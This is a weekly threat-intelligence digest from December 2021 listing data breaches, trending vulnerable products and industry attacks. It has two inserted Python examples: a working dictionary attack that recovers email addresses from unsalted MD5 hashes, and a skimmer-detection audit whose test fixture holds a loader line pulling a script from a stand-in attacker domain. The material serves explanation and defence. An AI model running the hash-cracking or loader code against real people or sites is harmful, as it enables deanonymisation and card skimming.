09 December 2021

Silobreaker’s Weekly Cyber Digest is a quantitative summary of our threat reports, published every Thursday. The reports are created using our award-winning intelligence product Silobreaker Online.

Trending Vulnerable Products

Open Source
Name Heat 7
Huawei Smartphone
Mozilla Firefox
ZOHO ManageEngine ServiceDesk Plus
SonicWall SMA 100 Series
Grafana
Deep & Dark Web
Name Heat 7
Microsoft Exchange Server Enterprise
Apple MacBook
Grafana
Apache HTTP Server
Debian

The tables show the products which have been mentioned more than usual during the last week in connection with vulnerabilities.

Data Leaks & Breaches

Leaks & Breaches
Company | Information | Affected
Kisters AG (Germany) | Following a ransomware attack on November 10th, 2021, Conti threat actors temporarily published 5% of the data allegedly stolen from the company's servers. It is unclear why the listing was later removed. | Unknown
Delta-Montrose Electric Association (US) | The company allegedly lost 25 years of historical data in a cyberattack discovered on November 7th, 2021. According to ZDNet, the incident may have been a ransomware attack. The company claims no sensitive employee or customer data was breached. | Unknown
Social Enterprise for Canada | Its systems were encrypted by ransomware on November 23rd, 2021. The attack escalated by December 1st, 2021, when some clients received emails threatening to leak their personal information if they did not click an attached link. | Unknown
Unknown (China) | An unclaimed Elasticsearch server exposed 329,144 sensitive records, around 500MB of data, from November 2020 onward. It is thought to belong to an anonymous Chinese enterprise resource planning company. The exposed data includes buyer names, phone numbers, email addresses, and delivery and billing addresses. Exposed data on e-commerce sellers includes names, email addresses, billing addresses, and estimated profits. | ~150,000
Gale Healthcare Solutions (US) | A database belonging to the company was discovered with no password protection. It contained 170,239 records, including employee names, phone numbers, email and home addresses, images, and tax documents containing Social Security numbers. | Unknown
Tulane University Police Department (US) | An unredacted Daily Activity Report from the department was accessible to anyone with a Tulane University email address. The files exposed the names of victims, witnesses, reporting persons, individuals seeking medical attention, and suspects who interacted with the department. Dates of birth, phone numbers, and addresses were also visible. | Unknown
Gravatar (US) | A vulnerability in the avatar service, first identified in 2020, allowed names, usernames, and MD5 hashes of email addresses to be scraped and distributed. Just under 114 million of the MD5 hashes were cracked and distributed alongside the source hash, disclosing the original email addresses. | 167,000,000
CareFirst BlueCross BlueShield Community Health Plan District of Columbia (US) | Snatch threat actors added the company to their dark web leak site following a ransomware attack in January 2021. Snatch Team claims that 25GB of data was exfiltrated. Data published as proof includes several files containing protected health information. | 200,665
LINE Pay (Japan) | An employee accidentally published payment details of Japanese, Taiwanese, and Thai users, covering December 2020 to April 2021, on GitHub. The data was accessible for ten weeks and exposed dates, times, and amounts of transactions, as well as user and franchise store identification numbers. | 133,000
Unknown | Spectral researchers discovered complete Apache Kafka clusters exposed on the internet through misconfigured instances of Kafdrop, an open source Kafka UI and management interface. Affected sectors include insurance, healthcare, Internet of Things, media, and social networks. Customer data, transactions, medical records, internal system traffic, and more were exposed. | Unknown
Nordic Choice Hotels (Norway) | A cyberattack occurred on December 2nd, 2021, affecting reservations, check-in, and other systems. Customers' reservation details, email addresses, and phone numbers may have been affected. | Unknown
Abiom (Netherlands) | Volkskrant reported that the company was targeted by LockBit ransomware operators. The actor leaked 39,000 documents relating to the Dutch government, police, emergency services, and others. Exposed information includes ID documents, police invoices, confidential communication, and details of equipment used by the defence department. | Unknown
Vestas (Denmark) | The company confirmed data was stolen during the recent ransomware attack. The data may also have been leaked and shared with third parties. | Unknown
Pellissippi State Community College (US) | The college suffered a network outage on December 6th, 2021, which has since been identified as a ransomware attack. As of December 7th, 2021, all network connections across its campuses remained down. | Unknown
RATP Group (France) | An old HTTP server belonging to the company was left open and accessible. The exposed data included configuration files, source code containing API keys, and an SQL database of over 3 million records, including personally identifiable information such as names, email addresses, logins, and hashed passwords. | 57,000
MaxiPublica (Mexico) | A data breach occurred due to an internal mistake whereby the company's system sent all users and users' clients an email containing a link to its entire database. Around 2,400 businesses are also thought to be affected. | 1,500,000
Microsoft Vancouver (Canada) | In September 2021, Cyber News researchers discovered a .DS_Store (Desktop Services Store) file exposed on a publicly accessible web server. The file contained links to several WordPress databases featuring administrator email addresses and MD5-hashed passwords for the company's website. | Unknown
CS Energy (Australia) | The company was listed on the Conti ransomware leak site, operated by the Wizard Spider threat group, following a ransomware attack in November 2021. | Unknown
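The Gravatar entry above turns on one point worth seeing concretely: an unsalted MD5 of an email address is not a secret, because the input space is small and highly structured (common first names, surnames, a few naming patterns, a handful of domains), so a plain dictionary attack recovers the addresses. The following Python script is an added example, not code from Silobreaker, Gravatar or the researchers cited. It uses Gravatar's documented derivation (MD5 of the trimmed, lowercased address); the "leaked" hash set, the name and domain wordlists and the server secret in it are all constructed for the demonstration. The keyed-hash alternative at the end is an illustration of a mitigation, not Gravatar's design.

```python
"""
Added example (not Silobreaker's, Gravatar's or the researchers' code):
dictionary attack against unsalted MD5(email) identifiers, plus a keyed
alternative. Leaked set, wordlists and SERVER_SECRET are constructed.
"""
import hashlib
import hmac
import itertools


def gravatar_hash(email):
    """Gravatar's documented identifier: MD5 hex of the trimmed, lowercased email."""
    return hashlib.md5(email.strip().lower().encode("utf-8")).hexdigest()


# Constructed "scrape": the attacker only holds these hashes, not the addresses.
LEAKED = {gravatar_hash(e) for e in
          ["Jane.Doe@example.com", "jdoe42@example.org", "alice@example.net"]}

# Tiny constructed wordlists; a real attack uses breach corpora plus the
# usernames that were scraped alongside the hashes.
FIRSTS = ["jane", "john", "alice", "bob"]
LASTS = ["doe", "smith"]
DOMAINS = ["example.com", "example.org", "example.net"]


def candidate_local_parts(firsts, lasts, max_suffix=100):
    """Common mailbox patterns: first, first.last, firstlast, flast, flastNN."""
    for f in firsts:
        yield f
        for l in lasts:
            yield f"{f}.{l}"
            yield f"{f}{l}"
            yield f"{f[0]}{l}"
            for n in range(max_suffix):
                yield f"{f[0]}{l}{n}"


def crack(hashes, firsts, lasts, domains):
    """Hash every candidate address and look it up in the leaked set.
    Returns (recovered {hash: email}, number of candidates hashed)."""
    recovered, tried = {}, 0
    for local, domain in itertools.product(candidate_local_parts(firsts, lasts), domains):
        tried += 1
        email = f"{local}@{domain}"
        h = gravatar_hash(email)
        if h in hashes:
            recovered[h] = email
            if len(recovered) == len(hashes):
                break
    return recovered, tried


# Illustrative mitigation (not Gravatar's scheme): a keyed hash with a
# server-side secret cannot be recomputed from a wordlist alone.
SERVER_SECRET = b"constructed-secret-never-leaves-the-server"


def keyed_identifier(email):
    """HMAC-SHA256 over the normalised address under a server-held key."""
    return hmac.new(SERVER_SECRET, email.strip().lower().encode("utf-8"),
                    "sha256").hexdigest()


if __name__ == "__main__":
    found, n = crack(LEAKED, FIRSTS, LASTS, DOMAINS)
    print(f"recovered {len(found)}/{len(LEAKED)} after {n} candidates: "
          f"{sorted(found.values())}")
    keyed = {keyed_identifier(e) for e in found.values()}
    print("keyed identifiers recovered by the same attack:",
          crack(keyed, FIRSTS, LASTS, DOMAINS)[0])
```

With a few hundred candidates per surname the three constructed addresses fall out immediately; hashlib computes MD5 at millions of candidates per second on commodity hardware, which is why 114 million of the 167 million scraped hashes could be cracked. The same loop run against the keyed identifiers recovers nothing, because the attacker cannot compute the candidate identifiers without the secret.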

Malware mentions in Government

[Time series chart] This chart shows the trending malware related to Government within a curated list of cyber sources over the past week.

Weekly Industry View

Industry View
Industry | Information
Banking & Finance | A smishing campaign delivering the Android banking trojan BRATA is targeting customers of one of the biggest Italian retail banks, whilst new samples discovered in mid-October targeted customers of three Italian banks. Fake SMS messages impersonating the banks contain links to phishing websites used to steal credentials and other relevant information from the victim. The malware has remote access trojan capabilities, including intercepting SMS messages, screen recording and casting, removing itself from the compromised device to reduce detection, modifying device settings, and more.
Education | Proofpoint researchers observed an increase in credential theft campaigns targeting mostly North American education institutions, with lures including COVID-19 testing information and the Omicron variant. The campaigns using these lures began in October 2021. The phishing emails contain malicious attachments or URLs, and the landing pages often imitate a university login portal or a generic Office 365 login portal. The researchers also observed that threat actors attempted to harvest multi-factor authentication credentials in some of the campaigns.
Critical Infrastructure | The United States Federal Bureau of Investigation (FBI) issued a flash alert in coordination with the Cybersecurity and Infrastructure Security Agency (CISA) disclosing that at least 49 US critical infrastructure organisations had been compromised by Cuba ransomware operators as of November 2021. The targeted sectors include financial, government, healthcare, manufacturing, and information technology. The FBI also revealed the actors demanded at least $74 million in ransom payments and received at least $43.9 million.
Government | Malwarebytes Labs researchers observed the advanced persistent threat actor SideCopy using new initial infection vectors and a new stealer, named AuTo Stealer. SideCopy primarily targets South Asian countries, specifically India and Afghanistan, via spam or phishing campaigns. Successful attacks targeted personnel of the Administration Office of the President of Afghanistan, the Ministry of Foreign Affairs of Afghanistan, the Ministry of Finance of Afghanistan, Afghanistan's National Procurement Authority, and others. From these victims, SideCopy exfiltrated data such as credentials, access to government portals, banking services, personal accounts such as Twitter and Facebook, password-protected documents, diplomatic visas and diplomatic ID cards, and more.
Retail & Hospitality | Since February 4th, 2021, Gemini researchers have observed ongoing Magecart campaigns that have infected 316 e-commerce sites with trojanised Google Tag Manager (GTM) containers. One infection variant embeds a malicious e-skimmer JavaScript directly in the container. Another variant uses a single GTM container across all victims, housing a script that downloads the e-skimmer from a separate dual-use domain that is also used for data exfiltration. The researchers attribute the variants to two separate Magecart groups. The campaign primarily targeted Magento 2 users in the United States, but targets were also identified in Canada, Germany, Italy, Australia, the United Kingdom, and elsewhere. So far, the actors behind this campaign have posted at least 88,000 payment card records to the dark web.
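The Retail & Hospitality entry describes two ways a GTM container is abused: the skimmer is either embedded in the container itself, or the container only carries a loader that fetches the skimmer from an attacker domain that doubles as the exfiltration endpoint. Neither shows up in the shop's own source code, so the practical first check is an allow-list audit of what the checkout page actually loads: every GTM container ID present, every third-party script origin, and every origin referenced from inside the container JavaScript. The Python script below is an added example, not code from Gemini, Silobreaker or any of the affected merchants; the page HTML, the container payload, the container IDs and the domains in it are constructed for the demonstration. It catches the second variant (a loader pointing at an unknown origin) and a rogue extra container; an embedded skimmer that exfiltrates only to an allow-listed origin would need content review beyond this check.

```python
"""
Added example (not Gemini's or Silobreaker's code): allow-list audit of a
checkout page and its Google Tag Manager container. All HTML, JavaScript,
container IDs and hostnames below are constructed for the demonstration.
"""
import re
from urllib.parse import urlsplit

GTM_ID_RE = re.compile(r"\bGTM-[A-Z0-9]{4,10}\b")
SCRIPT_SRC_RE = re.compile(r"<script\b[^>]*\bsrc=[\"']([^\"']+)[\"']", re.I)
# Absolute and protocol-relative URLs inside JavaScript. A "//word" comment
# with no space after the slashes would also match; filter such noise if seen.
URL_RE = re.compile(r"(?:https?:)?//[A-Za-z0-9.-]+[^\s'\"<>)]*")


def origin(url):
    """Lowercased host of a URL; empty string for relative (first-party) paths."""
    return urlsplit(url).netloc.lower()


def find_gtm_ids(html):
    """Every container ID referenced in the page, from loader tags or snippets."""
    return set(GTM_ID_RE.findall(html))


def script_origins(html):
    """Hosts of all external <script src=...> tags; relative paths are skipped."""
    return {origin(src) for src in SCRIPT_SRC_RE.findall(html) if origin(src)}


def origins_in_js(js):
    """Hosts of every URL literal inside a container's JavaScript."""
    return {origin(u) for u in URL_RE.findall(js) if origin(u)}


def audit(page_html, containers, allowed_ids, allowed_origins):
    """Return (finding_type, detail) pairs for anything outside the allow-lists.
    containers maps container ID -> the JavaScript served for that container."""
    findings = []
    for cid in sorted(find_gtm_ids(page_html) - set(allowed_ids)):
        findings.append(("unexpected_gtm_container", cid))
    for host in sorted(script_origins(page_html) - set(allowed_origins)):
        findings.append(("unexpected_script_origin", host))
    for cid, js in sorted(containers.items()):
        for host in sorted(origins_in_js(js) - set(allowed_origins)):
            findings.append(("unexpected_container_origin", f"{cid}:{host}"))
    return findings


# Constructed checkout page: the merchant's real container plus an injected
# second GTM snippet and an injected third-party script tag.
PAGE_HTML = """<html><head>
<script src="https://www.googletagmanager.com/gtm.js?id=GTM-ABC1234"></script>
<script>
(function(w,d,s,l,i){w[l]=w[l]||[];var f=d.getElementsByTagName(s)[0],j=d.createElement(s);
j.src='https://www.googletagmanager.com/gtm.js?id='+i;f.parentNode.insertBefore(j,f);
})(window,document,'script','dataLayer','GTM-ZZZ9999');
</script>
<script src="/static/checkout.js"></script>
<script src="//static.constructed-bad.example/jquery.min.js"></script>
</head><body></body></html>"""

# Constructed payload for the legitimate container ID: one normal tag plus a
# loader of the second-variant kind, pulling a script from an unknown origin.
CONTAINER_JS = """
new Image().src = 'https://www.google-analytics.com/collect?v=1&tid=UA-1';
(function(){var s=document.createElement('script');
s.src='https://cdn.constructed-bad.example/loader.js';document.head.appendChild(s);})();
"""

ALLOWED_IDS = {"GTM-ABC1234"}
ALLOWED_ORIGINS = {"www.googletagmanager.com", "www.google-analytics.com"}


def audit_demo():
    """Run the audit on the constructed page and container."""
    return audit(PAGE_HTML, {"GTM-ABC1234": CONTAINER_JS}, ALLOWED_IDS, ALLOWED_ORIGINS)


if __name__ == "__main__":
    for kind, detail in audit_demo():
        print(f"{kind}: {detail}")
```

The allow-lists are the whole point: a merchant knows which container ID it created and which hosts its checkout legitimately talks to, so anything else in the page or in the served container is a finding to investigate, regardless of whether the skimmer code itself is obfuscated. The container JavaScript should be fetched from googletagmanager.com at audit time, since that is where the malicious version lives.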

News and information concerning each mentioned industry over the last week.
